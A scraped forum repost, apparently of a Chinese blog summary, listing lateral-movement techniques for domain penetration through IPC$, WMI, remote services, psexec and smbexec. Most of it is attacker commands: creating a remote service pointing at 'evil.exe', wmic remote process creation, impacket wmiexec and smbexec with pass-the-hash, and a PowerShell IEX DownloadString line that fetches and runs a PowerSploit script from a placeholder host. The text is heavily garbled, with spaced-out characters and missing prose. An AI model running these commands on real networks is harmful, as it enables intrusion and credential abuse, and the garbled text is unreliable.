[22277] 2021-08-21_域渗透中利用ipc命令执行总结

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-18
2021-08-21_域渗透中利用ipc命令执行总结 i p c L e t i c i a ' s   B l o g   L e m o n S e c   2 0 2 1 - 0 8 - 2 1   h t t p s : / / b l o g . c s d n . n e t / n i e x i n m i n g / a r t i c l e / d e t a i l s / 7 5 6 5 0 1 2 8 a d m i n s c n e t   s h a r e   $ i p c n e t   s h a r e   $ a d m i n d i r   I P c $ t a s k l i s t   / S   I P   / U     / P  
w m i c w m i e x e c . p y : s c   [ H O S T ]   c r e a t e   b o o m   b i n p a t h =   c : e v i l . e x e s c   [ H O S T ]   s t a r t   b o o m s c   [ H O S T ]   d e l e t e   b o o m w m i c   / n o d e : 1 7 2 . 1 8 . 1 6 . 1 7 2   / u s e r : a d m i n   / p a s s w o r d : p a s s w o r d     p r o c e s s   c a l l   c r e a t e   " c m d . e x e   / c   i p c o n f i g > c : r e s u l t . t x t " g i t   c l o n e   h t t p s : / / g i t h u b . c o m / C o r e S e c u r i t y / i m p a c k e t . g i t c d   i m p a c k e t / p i p   i n s t a l l p y t h o n   w m i e x e c . p y   : @ I P p y t h o n   w m i e x e c . p y   - h a s h e s   L M   H a s h : N T   H a s h   / @ I P
w m i e x e c . v b s p o w e r s h e l l h t t p s : / / g i t h u b . c o m / P o w e r S h e l l M a f i a / P o w e r S p l o i t c s c r i p t . e x e   w m i e x e c . v b s   / c m d   1 7 2 . 1 8 . 1 6 . 1 7 2   a d m i n i s t r a t o r   p a s s w o r d   c o m m a n d I n v o k e - W m i C o m m a n d . p s 1 P o w e r S p l o i t p o w e r s h e l l W M I W M I
g i t   c l o n e   h t t p s : / / g i t h u b . c o m / P o w e r S h e l l M a f i a / P o w e r S p l o i t . g i t c d   P o w e r S p l o i t - m a s t e r P o w e r S p l o i t - m a s t e r C o d e E x e c u t i o n p y t h o n   m   S i m p l e H T T P S e r v e r p o w e r s h e l l I E X ( N e w - O b j e c t   N e t . W e b c l i e n t ) . D o w n l o a d S t r i n g ( ' h t t p : / / x x . x x . x x . x x / / I n v o k e - W m i C o m m a n d . p s 1 ' ) $ U s e r   =   " "           / /   $ P a s s w o r d   =   C o n v e r t T o - S e c u r e S t r i n g   - S t r i n g   " "   - A s P l a i n T e x t   - F o r c e       / /   $ C r e d   =   N e w - O b j e c t   - T y p e N a m e   S y s t e m . M a n a g e m e n t . A u t o m a t i o n . P S C r e d e n t i a l   - A r g u m e n t L i s t   $ U s e r , $ P a s s w o r d         / /   便 c r e d e n t i a l $ R e m o t e   =   I n v o k e - W m i C o m m a n d   - P a y l o a d   { }   - C r e d e n t i a l   $ C r e d   - C o m p u t e r N a m e   I P $ R e m o t e . P a y l o a d O u t p u t               / /  
I n v o k e - W M I M e t h o d . p s 1 ( ) I n v o k e - W M I M e t h o d . p s 1 p o w e r s h e l l p o w e r s h e l l p s e x e c $ U s e r = " "         / /   $ P a s s w o r d = C o n v e r t T o - S e c u r e S t r i n g   - S t r i n g   " "   - A s P l a i n T e x t   - F o r c e       / /   $ C r e d = N e w - O b j e c t   - T y p e N a m e   S y s t e m . M a n a g e m e n t . A u t o m a t i o n . P S C r e d e n t i a l   - A r g u m e n t L i s t   $ U s e r , $ P a s s w o r d           / /   便   C r e d e n t i a l I n v o k e - W M I M e t h o d   - C l a s s   W i n 3 2 _ P r o c e s s   - N a m e   C r e a t e   - A r g u m e n t L i s t   " n o t e p a d . e x e "   - C o m p u t e r N a m e   " I P "   - C r e d e n t i a l   $ C r e d p s e x e c . e x e   i p   u     p     c m d . e x e   / c   i p c o n f i g  
s m b e x e c h t t p s : / / w w w . f r e e b u f . c o m / a r t i c l e s / n e t w o r k / 2 4 6 4 4 0 . h t m l   h t t p s : / / c l o u d . t e n c e n t . c o m / d e v e l o p e r / a r t i c l e / 1 7 5 2 1 4 5 L e t i c i a ' s   B l o g S R C C S A p a c h e   T o m c a t     W A R     h a s h h a s h ( 使 ) h t t p s : / / g i t h u b . c o m / S e c u r e A u t h C o r p / i m p a c k e t s m b e x e c . p y   : @ I P
w e b l o g i c   s p r i n g L e m o n S e c
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则